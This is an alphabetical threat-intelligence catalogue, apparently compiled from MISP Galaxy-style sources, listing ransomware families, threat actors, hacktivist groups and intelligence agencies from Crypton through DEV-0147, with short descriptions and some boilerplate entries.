This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Crypton
Ransomware
CryptoNar
When the CryptoNar, or Crypto Nar, Ransomware encrypts a victims files it will perform the encryption differently depending on the type of file being encrypted. If the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file's name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extensions appended to the file's name.
CryptoPatronum
Ransomware
CryptoPokemon
Ransomware
CryptoRansomeware
Ransomware
CryptorBit
Ransomware
Cryptorium (Fake Ransomware)
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It SUPPOSEDLY encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc., however your files are not really encrypted, only the names are changed.
CryptoRoger
Ransomware
CryptoShadow
Ransomware
CryptoShield 1.0 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoShield 1.0 is a ransomware from the CryptoMix family.
CryptoShield 2.0
Ransomware
CryptoShocker
Ransomware
CryptoSpider
Ransomware
CryptoSweetTooth Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Its fake name is Bitcoin and maker’s name is Santiago. Work of the encrypted requires the user to have .NET Framework 4.5.2. on his computer.
CryptoTorLocker2015
Ransomware
CryptoTrooper
Ransomware
CryptoViki
Ransomware
CryptoWall 1
Ransomware, Infection by Phishing
CryptoWall 2
Ransomware
CryptoWall 3
Ransomware
CryptoWall 4
Ransomware
CryptoWire Ransomeware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Cryptre
Ransomware
CrypTron
Ransomware
CryptXXX 2.0
Ransomware Locks screen. Ransom note names are an ID. Comes with Bedep.
CryptXXX 3.0
Ransomware Comes with Bedep
CryptXXX 3.1
Ransomware StilerX credential stealing
CryptXXX
Ransomware Comes with Bedep
Crypute Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
CryPy
Ransomware
Crysis XTBL
Ransomware
Crystal
Ransomware
CrystalCrypt
Ransomware
CRYSTALRAY
CRYSTALRAY is a threat actor known for leveraging open source tools like zmap and SSH-Snake to conduct widespread vulnerability scanning and exploitation. They target victims to collect and sell credentials, deploy cryptominers, and maintain persistence in compromised environments. CRYSTALRAY uses multiple backdoors to control access and spreads through victim networks using SSH-Snake. The actor also uses tools like Platypus for managing victims and extracting sensitive information from compromised systems.
CryTekk
Ransomware
cs-137
Cs‑137 is a newly observed ransomware strain that first appeared in January 2025. It employs the ChaCha20 cipher for encryption and appends obfuscated filenames with a random 10-character alphanumeric identifier while preserving the original file extension. In its current testing phase, it drops a ransom note with a randomized filename (e.g. ABCDEF-README.txt) and sets a randomly named image file as the desktop wallpaper. The note references a Tor-based extortion portal—though access is not yet active, indicating the operation’s early development stage. The strategy suggests single-extortion behavior, focused on disrupting access rather than data theft or leak threats.
CSGO Ransomware
Supposed joke ransomware, decrypt when running an exectable with the string "csgo"
CSP
Ransomware
CTB-Faker
Ransomware
CTB-Locker Original
Ransomware
CTB-Locker WEB
Ransomware websites only
ctblocker
aka Critroni
CTB‑Locker emerged in mid‑2014, introducing a new era of ransomware by leveraging elliptic curve cryptography (ECC), Tor-based C&C communication, and Bitcoin payments—earning its name from “Curve-Tor-Bitcoin Locker.” It was packaged and sold as a ransomware kit for approximately $1,500–$3,000, allowing affiliates to deploy customized campaigns. The malware encrypts user data (including network and removable drives), changes desktop wallpapers, and appends file extensions like .CTBL, .CTB2, or randomized strings. Victims receive instructions for payment, typically within a limited timeframe, or risk permanent data loss. In 2015–2017, law enforcement and cybersecurity firms (including McAfee and Kaspersky) disrupted the network, arrested operators, and facilitated decryption tools.
CTF
Ransomware
Cuba Ransomware Actors
A Group object to represent actors that deploy Cuba Ransomware in victim environments.[[U.S. CISA Cuba Ransomware October 2022](/references/d6ed5172-a319-45b0-b1cb-d270a2a48fa3)]
Cuba
The Cuba Ransomware, also known as Colddraw Ransomware, was first identified in the threat landscape in 2019 and built a relatively small but selected list of victims. The group is also known as Fidel Ransomware, due to a characteristic marker placed at the beginning of all encrypted files. This file marker is used as an indicator for the ransomware and its decoder that the file has been encrypted. Despite its name and the Cuban nationalist style on its leak site, it is difficult to assert any connection or affiliation with the Republic of Cuba. The group has been linked to a Russian-language threat actor by Profero researchers due to some details of incorrect translation they discovered, as well as the discovery of a 404 page containing text in Russian on the threat actor's own leak site. According to BlackBerry, based on the analysis of the code strings used in the campaign analyzed in 2023, there were indications that the developer behind the Cuba ransomware speaks Russian. The ransomware operators use a double extortion approach, and following the USA, in August 2022, it was believed that the Cuba ransomware group had compromised 101 entities, demanding $145 million in ransom payments and receiving up to $60 million. The group used a similar set of TTPs, with only a slight change each year, as they generally consist of LOLBins (executables that are part of the operating system and can be exploited to support an attack), exploits, off-the-shelf and custom malware, as well as intrusion tools like Cobalt Strike and Metasploit. In 2022, the group allegedly developed a relationship with operators of the Industrial Spy market, using their platform as a means of data leakage.
Cuboid Sandstorm
Cuboid Sandstorm is an Iranian threat actor that targeted an Israel-based IT company in July 2021. They gained access to the company's network and used it to compromise downstream customers in the defense, energy, and legal sectors in Israel. The group also utilized custom implants, including a remote access Trojan disguised as RuntimeBroker.exe or svchost.exe, to establish persistence on victim hosts.
Curator
ransomware
Curious Gorge
Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia. The actor has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs. Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.
Curly COMrades
Curly COMrades is a threat actor identified by Amazon Threat Intelligence and Bitdefender, believed to operate in support of Russian interests. They employ techniques such as Hyper-V abuse for EDR evasion and utilize proxy tools like Resocks, SSH, and Stunnel to gain access to internal networks. Their activities include repeated attempts to extract the NTDS database from domain controllers and establishing covert access through virtualization features on compromised Windows 10 machines.
Curumim
Ransomware
Cutekitty
ransomware
CuteRansomware
Ransomware Based on my-Little-Ransomware
Cutting Kitten
One of the threat actors responsible for the denial of service attacks against U.S in 2012–2013. Three individuals associated with the group—believed to be have been working on behalf of Iran’s Islamic Revolutionary Guard Corps—were indicted by the Justice Department in 2016.
CVLocker
Ransomware
Cyber Alliance
The Ukrainian Cyber Alliance is a pro-Ukraine hacktivist group formed in 2016, primarily targeting Russian entities since the invasion of Ukraine in 2022. They have claimed responsibility for significant cyberattacks, including the destruction of infrastructure at Russian internet provider Nodex and a breach of the microfinance company CarMoney, linked to Vladimir Putin's ex-wife. Their operations involve data destruction and disruption of IT infrastructure, utilizing techniques such as malware attacks and social engineering tactics. The group has positioned itself as a pro-military force, leveraging social media to communicate its activities and objectives.
Cyber.Anarchy.Squad
Cyber Anarchy Squad is a pro-Ukrainian hacktivist group known for targeting Russian companies and infrastructure. They have carried out cyberattacks on Russian telecom providers, financial institutions, and government agencies, causing disruptions to services and leaking stolen data. The group has used techniques such as wiping network equipment, defacing websites, and leaking sensitive documents to support their cause. Cyber Anarchy Squad has been active for at least four years, evolving from cyber-bullying to more sophisticated hacking activities.
Cyber Army of Russia Reborn
Cyber Army of Russia Reborn is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Cyber Army of Russia
The Cyber Army of Russia is a threat group that appears to carry out cyber attacks in line with Russian strategic interests. The group has claimed many distributed denial of service (DDoS) attacks against a variety of targets perceived as opposed to Russian interests. More recently, it has claimed disruptive industrial software-based attacks against water utilities in the United States, France, and Poland. Researchers link the Cyber Army of Russia to APT44 / Sandworm Team, although it remains unclear what level of direct support, if any, is provided by the latter group.[[Wired Cyber Army of Russia April 17 2024](/references/53583baf-4e09-4d19-9348-6110206b88be)][[Mandiant APT44 April 17 2024](/references/a64f689e-2bb4-4253-86cd-545e7f633a7e)]
Cyber Av3ngers
The CyberAv3ngers are a suspected Iranian Government Islamic Revolutionary Guard Corps (IRGC)-affiliated APT group. The CyberAv3ngers have been known to be active since at least 2020, with disputed and false claims of critical infrastructure compromises in Israel. [CISA AA23-335A IRGC-Affiliated December 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a) In 2023, the CyberAv3ngers engaged in a global targeting and hacking of the Unitronics Programmable Logic Controller (PLC) with Human-Machine Interface (HMI). This PLC can be found in multiple sectors, including water and wastewater, energy, food and beverage manufacturing, and healthcare. The most notable feature of this attack was the defacement of the devices user interface. [CISA AA23-335A IRGC-Affiliated December 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a)
Cyber Berkut
Cyber Berkut is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Cyber Caliphate Army
Cyber Caliphate Army is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Cyber Drill Exercise
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Cyber fighters of Izz Ad-Din Al Qassam
Cyber fighters of Izz Ad-Din Al Qassam is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Cyber Islamic Resistance
Cyber Islamic Resistance is a hacktivist collective ideologically aligned with Iran, engaging in operations such as website defacements, DDoS attacks, and data exfiltration targeting Israeli and Western entities. They have claimed breaches of Israeli cybersecurity firms and academic platforms, framing their actions as part of a broader narrative of retaliation. The group has also targeted critical infrastructure, asserting access to industrial control systems and operational technology environments. Their activities are often presented as part of a coordinated cyber mobilization campaign, emphasizing psychological and reputational impacts.
Cyber Partisans
The Cyber Partisans, a hacktivist group based in Belarus, has been involved in various cyber-attacks targeting organizations and infrastructure in Belarus and Ukraine. They have hacked and wiped the network of the Belarusian Telegraph Agency, targeted the Belarusian Red Cross, and conducted ransomware attacks on the Belarusian Railway and Belarusian State University. The group aims to expose alleged crimes committed by pro-government organizations and disrupt operations supporting the Russian military operation against Ukraine. They have also leaked stolen data to journalists and expressed support for Ukraine.
Cyber Police HT
Ransomware
Cyber Serp
UAC-0255 is a threat actor that conducted a phishing campaign impersonating CERT-UA to distribute the AGEWHEEZE RAT, targeting organizations in Ukraine's public and private sectors. The campaign is part of a broader trend of using trusted identities to enhance victim engagement, as seen in previous activities like UAC-0190 and UAC-0252. CERT-UA identified UAC-0255 after discovering links to the CyberSerp Telegram channel, which claimed responsibility for the attack. The activity is documented under the identifier CERT-UA#21075, with detection rules available for cybersecurity analysts.
Cyber SpLiTTer Vbs
Ransomware Based on HiddenTear
Cyber Toufan
Cyber Toufan is a threat actor group that has gained prominence for its cyberattacks targeting Israeli organizations. The group's tactics suggest potential nation-state backing, possibly from Iran. They have been involved in hack-and-leak operations, data breaches, and data destruction, impacting over 100 organizations. Cyber Toufan's activities align with geopolitical tensions in the Middle East and their attacks are characterized by a combination of technical breaches and psychological warfare.
CyberDrill2
Ransomware
Cyberex
Cyberex is an active extortion or ransomware group tracked by RansomLook.
CyberNiggers
CyberNiggers is a threat group known for breaching various organizations, including the US military, federal contractors, and multinational corporations like General Electric. Led by the prominent member IntelBroker, they specialize in selling access to compromised systems and stealing sensitive data, such as military files and personally identifiable information. The group has targeted a diverse portfolio of organizations, showcasing their strategic approach to gathering varied sets of information. Their activities raise concerns about national security, individual privacy, and the need for robust cybersecurity measures to mitigate the impact of cyber adversaries.
CyberResearcher
Ransomware
CyberSCCP
Ransomware
CyberSoldier
Ransomware
CyberVolk
CyberVolk is a politically motivated hacktivist collective originating in India with pro-Russia leanings. The group is known for launching ransomware and DDoS attacks to undermine and disrupt operations of entities that are perceived to be opposed to Russian interests.[[SentinelOne November 25 2024](/references/71c8e60c-a72a-4bff-aae3-f3f155fa22ee)]
Cyborg Ransomware
Ransomware delivered using fake Windows Update spam
Cyclone
Ransomware
cyclops
Cyclops ransomware was rebranded as Knight around mid‑2023, emerging initially in early 2023. It operates as a Ransomware-as-a-Service (RaaS), targeting multiple platforms including Windows, macOS, Linux, and ESXi systems. Crafted in Go, it uses strong encryption algorithms like ChaCha20 and Curve25519. Knight includes both a full and "lite" encryptor, supports batch attacks, hosts a Tor leak site, and offers a web portal for affiliates—positioning itself as a scalable and partner-friendly ransomware operation. Affiliates can manage deployments, track payments, and negotiate with victims through a sophisticated RaaS platform.
Cylance
Cylance is an active extortion or ransomware group tracked by RansomLook.
CypherPy
Ransomware
Cyprus Intelligence Service
Cyprus Intelligence Service (CIS) (Κυπριακή Υπηρεσία Πληροφοριών)(ΚΥΠ), (former Central Intelligence Service-KYP)
CYR-Locker Ransomware (FAKE)
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The following note is what you get if you put in the wrong key code: https://3.bp.blogspot.com/-qsS0x-tHx00/WLM3kkKWKAI/AAAAAAAAEDg/Zhy3eYf-ek8fY5uM0yHs7E0fEFg2AXG-gCLcB/s1600/failed-key.jpg
Cyrat
ransomware
Cyron
claims it detected "Children Pornsites" in your browser history
Cyspt
Ransomware
Czech
Ransomware
D00mEd
Ransomware
d0glun
D0glun is a crypto-ransomware strain first observed in January 2025, believed to be derived from Babuk via an intermediary variant known as Cheng Xilun. It uses AES-256 symmetric encryption and appends filenames with patterns such as .@D0glun@
D2+D
Ransomware
d4rk4rmy
D4rk4rmy is a data-extortion focused threat actor that emerged in mid-2025, targeting high-profile organizations across sectors like financial services, hospitality, and education. It operates primarily through leak site extortion rather than encryption, listing prominent entities—such as Bridgewater Associates, Magellan Financial, Onex Canada Asset Management, Tsai Capital, Casino de Monte-Carlo, and others—on its Tor-based platform. The group has also hit victims in technology, logistics, and university sectors across multiple continents. Their tactic centers on reputation manipulation and public exposure to pressure victims into negotiations.
DAGGER PANDA
Operate since at least 2011, from several locations in China, with members in Korea and Japan as well. Possibly linked to Onion Dog. This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in Japan and South Korea.
Dagonlocker
Dagon Locker is a double-extortion ransomware family that surfaced around September 2022. It represents an evolution of the MountLocker and Quantum ransomware lines. The group employs strong encryption using ChaCha20 protected by RSA-2048 and appends the .dagoned extension to encrypted files. It provides operators flexibility through command-line options to control encryption behavior, such as skipping logs, deletions, or process termination. Notably, Dagon Locker is frequently distributed via phishing campaigns and as part of Brodin-based initial access chains. It operates under a Ransomware-as-a-Service (RaaS) model, engaging affiliates to launch customized campaigns—particularly targeting organizations in South Korea.
Dairat al-Mukhabarat al-Ammah
General Intelligence Department (GID) - (Da’irat al-Mukhabarat al-’Ammah)
Daixin Team
Daixin is a threat actor group that has been active since at least June 2022. They primarily target the healthcare and public health sector with ransomware attacks, stealing sensitive data and threatening to release it if a ransom is not paid. They have successfully targeted various industries, including healthcare, aerospace, automotive, and packaged foods. Daixin gains initial access through VPN servers and exploits vulnerabilities or uses phishing attacks to obtain credentials. They have been responsible for cyberattacks on organizations such as the North Texas Municipal Water District and TransForm Shared Service Org, impacting their networks and stealing customer and patient information.
Daixin
Daixin Team is a ransomware and data extortion group active since at least June 2022, known for targeting the healthcare sector, including hospitals, clinics, and related service providers. The group employs a double-extortion model—exfiltrating sensitive data before encrypting systems—and has leaked protected health information (PHI) to pressure victims. Intrusions often involve exploiting VPN vulnerabilities (notably in Fortinet FortiOS) and using compromised credentials for initial access. The ransomware uses AES for file encryption with RSA to protect the keys, and ransom notes direct victims to a Tor-based portal. The U.S. CISA, FBI, and HHS have issued joint advisories warning of the group’s impact on healthcare delivery and patient safety
Dalbit
The group usually targets vulnerable servers to breach information including internal data from companies or encrypts files and demands money. Their targets of attack are usually Windows servers that are poorly managed or are not patched to the latest version. Besides these, there are also attack cases that targeted email servers or MS-SQL database servers.
Dale Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… CHIP > DALE
Damage Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Written in Delphi
dan0n
dAn0n is a data-extortion actor that first appeared in April 2024. Operating primarily in a leak-focused extortion model, they publish stolen data on a Tor-hosted site rather than encrypting files. Their victims include organizations across sectors like business services, technology, healthcare, transportation, and legal—all largely based in the United States, with a few in Ireland and South Korea. Activity surged in May 2024, landing them in the top 10 most active ransomware actors that month. Despite limited branding efforts, their smaller operational footprint has allowed for swift, targeted breaches that prioritize rapid data exposure over elaborate cryptographic tactics.
Dancing Salome
Dancing Salome is the Kaspersky codename for an APT actor with a primary focus on ministries of foreign affairs, think tanks, and Ukraine. What makes Dancing Salome interesting and relevant is the attacker’s penchant for leveraging HackingTeam RCS implants compiled after the public breach.
Dangerous Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
DangerousSavanna
Malicious campaign called DangerousSavanna has been targeting multiple major financial service groups in French-speaking Africa for the last two years. The threat actors behind this campaign use spear-phishing as a means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. DangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are both self-written and based on open-source projects such as Metasploit, PoshC2, DWservice, and AsyncRAT. The threat actors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaders and malicious documents, to ISO, LNK, JAR and VBE files in various combinations. The evolving infection chains by the threat actor reflect the changes in the threat landscape seen over the past few years as infection vectors became more and more sophisticated and diverse.
Danish Defence Intelligence Service
Danish Defence Intelligence Service (Forsvarets Efterretningstjeneste (FE)).
Danish Security and Intelligence Service
Danish Security and Intelligence Service (Politiets Efterretningstjeneste (PET)).
Danti
Danti is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Dark Basin
Dark Basin is a hack-for-hire group that has targeted thousands of individuals and hundreds of institutions on six continents. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries. Dark Basin extensively targeted American nonprofits, including organisations working on a campaign called #ExxonKnew, which asserted that ExxonMobil hid information about climate change for decades. We also identify Dark Basin as the group behind the phishing of organizations working on net neutrality advocacy, previously reported by the Electronic Frontier Foundation. We link Dark Basin with high confidence to an Indian company, BellTroX InfoTech Services, and related entitie
Dark Shinigami
Dark Shinigami is an active extortion or ransomware group tracked by RansomLook.
Darkangel
Dark Angels is a highly targeted ransomware and data-extortion group that emerged in spring 2022. Rather than using an affiliate-driven model, it orchestrates discreet, high-impact attacks on large organizations—often choosing one Fortune-level victim at a time. The group exfiltrates massive volumes of data (sometimes 10–100 TB), optionally deploys encryption on Windows or ESXi systems, and pressures victims via a Tor-hosted leak platform ("Dunghill Leak"). Their notable incidents include extorting a record $75 million from a Fortune 50 company in 2024 and demanding around $51 million from Johnson Controls. Dark Angels’ operations emphasize stealth and precision over disruption, often avoiding high-profile media exposure and operating with low operational visibility.
Darkbit01
TOX: AB33BC51AFAC64D98226826E70B483593C81CB22E6A3B504F7A75348C38C862F00042F5245AC
DarkCasino
DarkCasino is an economically motivated APT group that targets online trading platforms, including cryptocurrencies, online casinos, network banks, and online credit platforms. They are skilled at stealing passwords to access victims' online accounts and have been active for over a year. DarkCasino exploits vulnerabilities, such as the WinRAR vulnerability CVE-2023-38831, to launch phishing attacks and steal online property.
DarkGaboon
DarkGaboon is a financially motivated APT group that has been independently targeting Russian organizations since May 2023, primarily using phishing emails to deliver malware such as Revenge RAT and LockBit 3.0 ransomware. Their operations demonstrate advanced operational security practices, including the use of homoglyphs in file names and decoy documents sourced from legitimate Russian templates to evade detection. The group has shown a disciplined approach to updating their toolkit, with 369 unique files identified, and employs command-and-control infrastructure located outside Russia. DarkGaboon's linguistic proficiency in Russian suggests a deep understanding of the local context, enhancing the effectiveness of their phishing lures.
darkhav0c
darkhav0c is an active extortion or ransomware group tracked by RansomLook.
DarkKomet
Ransomware
DarkLocker
Ransomware
DarkoderCryptor
Ransomware
DarkPink
DarkPink is an APT group that has been active since mid-2021, primarily targeting government, military, and non-profit organizations in Southeast Asia and Europe. The group employs spear phishing techniques, utilizing ISO images and malicious PDF files to deliver custom Trojan programs like TelePowerBot and KamiKakaBot for information theft. They have exploited vulnerabilities such as CVE-2023-38831 to enhance their attack processes and maintain persistence through DLL side-loading and scheduled tasks. DarkPink's operations are characterized by stealth and precision, making them a significant threat in the cyber landscape.
DarkRaaS
DarkRaaS is a threat actor specializing in selling unauthorized access to various organizations' systems and networks across multiple countries, with a recent focus on targets in Israel, UAE, Turkey, and South America 4 9 20. The group has been operating for at least six years and typically offers access to sensitive data, internal systems, and infrastructure, with prices ranging up to $25,000 for VPN access 4 9. Their targets span various sectors including government institutions, educational facilities, oil and gas companies, and IT organizations, often claiming to have access to multiple terabytes of sensitive data 7 19.
darkrace
DarkRace is a moderately destructive ransomware strain observed since 2024. It encrypts files and appends a randomized extension (e.g., .1352FF327) that varies per victim. Implemented as a 32-bit Windows application, it disables antivirus defenses, deletes volume shadow copies, terminates processes, and drops ransom note files for payment negotiation. Technical weaknesses in its encryption have enabled developers to produce a universal decryptor that works against DarkRace and related variants.
Darkrypt
Darkrypt is an active extortion or ransomware group tracked by RansomLook.
Darkside
Darkside, the latest ransomware operation to emerge has been attacking organizations beginning earlier this month. Darkside’s customized attacks on companies have already garnered them million-dollar payouts. Through their “press release”, these threat actors have claimed to be affiliated with prior ransomware operations making millions of dollars. They stated that they created this new product to match their needs, as prior products didn’t. Darkside explains that they only target companies they know that can pay the specified ransom. They have allegedly promised that they will not attack the following sectors. They include medicine, education, non-profit organizations, and the government sector.
DarkSpectre
DarkSpectre is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Darkvault
DarkVault is a versatile and opportunistic threat actor first observed in late 2023. Rather than being a traditional ransomware operation, it acts broadly as a data broker and extortion ensemble, publishing victim information—like company names and industries—via Tor-leak sites. Activities reportedly include doxing, website defacement, bomb threats, malware distribution, and swatting, suggesting a diversified cybercriminal portfolio beyond simple ransomware, often framed as an "exclusive online community." While the leak site design mirrors LockBit 3.0, there is no verified technical evidence linking DarkVault to LockBit's codebase. No ransomware executables or encryption tools have been confirmed; its role appears centered on data exposure and extortion without enforced file encryption.
darkwave
Written in python
darkylock
Darky Lock is a commodity-style ransomware strain first identified in July 2022, derived from publicly available Babuk source code. Victim systems undergo file encryption with an added “.darky” extension, and a “Restore-My-Files.txt” ransom note is placed in all impacted locations. The malware attempts to disable backup mechanisms, including shadow copies and specific applications. Its distribution leverages phishing and trojanized installers, complemented by payloads dropped via frameworks like Empire, Metasploit, and Cobalt Strike.
Datacarry
DataCarry is a newly observed ransomware and data-extortion operation, first seen in May 2025. It operates a double-extortion model, exfiltrating data and threatening publication via a Tor-hosted portal. The group has already claimed multiple victims across diverse sectors including insurance, healthcare, real estate, retail, and aerospace in countries such as Latvia, Belgium, Türkiye, South Africa, Switzerland, Denmark, and the United Kingdom. The rapid emergence and multi-country reach signal a well-organized operation.
Datacloud
ransomware
dataf locker
DataF Locker is a ransomware variant first observed in 2024, closely tied to the Babuk ransomware lineage. It operates under a double-extortion model, encrypting files by appending the .dataf extension and threatening to leak exfiltrated data if the ransom isn't paid. Victims receive a ransom note named How To Restore Your Files.txt, with satisfaction of specified recovery procedures. Observations suggest use of typical intrusion vectors such as phishing, exploit tools, or leaked credential abuse, although detailed delivery methods and leak infrastructure remain under-documented in high-tier intelligence reports.
DataKeeper
Ransomware
Dataleak
Dataleak is an active extortion or ransomware group tracked by RansomLook.
Datebatut
Ransomware
DBGer Ransomware
The authors of the Satan ransomware have rebranded their "product" and they now go by the name of DBGer ransomware, according to security researcher MalwareHunter, who spotted this new version earlier today. The change was not only in name but also in the ransomware's modus operandi. According to the researcher, whose discovery was later confirmed by an Intezer code similarity analysis, the new (Satan) DBGer ransomware now also incorporates Mimikatz, an open-source password-dumping utility. The purpose of DBGer incorporating Mimikatz is for lateral movement inside compromised networks. This fits a recently observed trend in Satan's modus operandi.
DCRTR-WDM
Ransomware
DCRTR
Ransomware
DCry
Ransomware
DDE
Ransomware
DEA Office of National Security Intelligence
DEA Office of National Security Intelligence (ONSI)
Deadbydawn
Deadbydawn is an active extortion or ransomware group tracked by RansomLook.
Deadeye Jackal
The Syrian Electronic Army (SEA) is a group of computer hackers which first surfaced online in 2011 to support the government of Syrian President Bashar al-Assad. Using spamming, website defacement, malware, phishing, and denial of service attacks, it has targeted political opposition groups, western news organizations, human rights groups and websites that are seemingly neutral to the Syrian conflict. It has also hacked government websites in the Middle East and Europe, as well as US defense contractors. As of 2011 the SEA has been *the first Arab country to have a public Internet Army hosted on its national networks to openly launch cyber attacks on its enemies*. The precise nature of SEA's relationship with the Syrian government has changed over time and is unclear
Deadly Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. sample is set to encrypt only in 2017...
DeadSec-Crypto
Ransomware
DearCry
ransomware
Death Bitches
Ransomware
deathgrip
DeathGrip is a Ransomware-as-a-Service (RaaS) that emerged around June 2024, offering malware payloads built with leaked LockBit 3.0 and Yashma/Chaos builders. Designed to lower technical barriers, it enables even low-skilled operators to deploy highly capable ransomware attacks. DeathGrip campaigns typically employ AES-256 encryption, delete shadow copies and recovery features, and modify system settings to hinder restoration. Earlier infections include low-tier ransom demands (e.g., around $100), reflecting entry-level targeting, though its flexible tooling allows a range of payload configurations.
DeathHiddenTear (Large&Small HT) >
Ransomware
DeathNote
Ransomware
DeathOfShadow
ransomware
DeathRansom
Ransomware
DEcovid19
ransomware
DeCrypt Protect
Ransomware
DecryptFox Ransomware
Michael Gillespie found a new ransomware uploaded to ID Ransomware that appends the .encr extension and drops a ransom note named readmy.txt.
DecryptIomega
Ransomware
Decryption Assistant
Ransomware
DecService
Ransomware
DecYourData
Ransomware
DEDCryptor
Ransomware Based on EDA2
Defence Intelligence Agency (Nigeria)
Defence Intelligence Agency (Military Intelligence)
Defence Intelligence Command (page does not exist)
Defence Intelligence Command [ko] (DIC)
Defence Intelligence Organisation
Defence Intelligence Organisation (DIO)
Defence Intelligence
Defence Intelligence (DI)[38] – Military intelligence analysis.
Defender
Ransomware
Defense Intelligence Agency (South Korea)
Defense Intelligence Agency (DIA)
Defense Intelligence Agency
Defense Intelligence Agency (DIA)
Defense Intelligence Headquarters
Defense Intelligence Headquarters (DIH)
Defense Security Support Command (page does not exist)
Defense Security Support Command [ko] (DSSC)
Defray (Glushkov)
Ransomware
DefrayX
DefrayX is a threat actor group known for their RansomExx ransomware operations. They primarily target Linux operating systems, but also release versions for Windows. The group has been active since 2018 and has targeted various sectors, including healthcare and manufacturing. They have also developed other malware strains such as PyXie RAT, Vatet loader, and Defray ransomware.
Delta
Delta is an active extortion or ransomware group tracked by RansomLook.
DEMIAP
General Staff of Military intelligence (ex-DEMIAP)
Demo
Ransomware only encrypts .jpg files
Denim Tsunami
Denim Tsunami is a threat actor group that has been involved in targeted attacks against European and Central American customers. They have been observed using multiple Windows and Adobe 0-day exploits, including one for CVE-2022-22047, which is a privilege escalation vulnerability. Denim Tsunami developed a custom malware called Subzero, which has capabilities such as keylogging, capturing screenshots, data exfiltration, and running remote shells. They have also been associated with the Austrian spyware distributor DSIRF.
Deos
Ransomware
Department of Border Affair (DBA)
Department of Border Affair (DBA)
Department of Homeland Security (Spain)
Department of Homeland Security (DSN)
Department of Naval Intelligence
Department of Naval Intelligence
Department of Smuggling, Intelligence, Operations and Information Collection (page does not exist)
Department of Smuggling, Intelligence, Operations and Information Collection (intelligence coordination)
DeriaLock Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Maker is arizonacode and ransom amount is 20-30$. If the victim decides to pay the ransom, he will have to copy HWID and then speak to the hacker on Skype and forward him the payment.
DeroHE
ransomware
Desktop
Ransomware
Desolated
Desolated is an active extortion or ransomware group tracked by RansomLook.
Desolator
Desolator is an active extortion or ransomware group tracked by RansomLook.
Desorden Group
Desorden (Disorder in Spanish, previously known as ChaosCC), is a financially motivated hacker group. The group first emerged under the new name Desorden in September 2021, on Raidforums. Today the group maintains users under that name on several popular English-speaking hacking forums, where they share their attacks and ransom demands, and offer databases for sale. The group gained an excellent reputation among the cybercriminal communities due to their successful operations and the unique data that they share and offer for sale.
Desync
This crypto ransomware encrypts enterprise LAN data with AES (ECB mode), and then requires a ransom in # BTC to return the files.
Detective Branch, Bangladesh Police
Detective Branch (DB)
DetoxCrypto
Ransomware - Based on Detox: Calipso, We are all Pokemons, Nullbyte
Deuxième Bureau (Morocco)
Deuxième Bureau (Morocco) - Military secret service[19]
DEV-0147
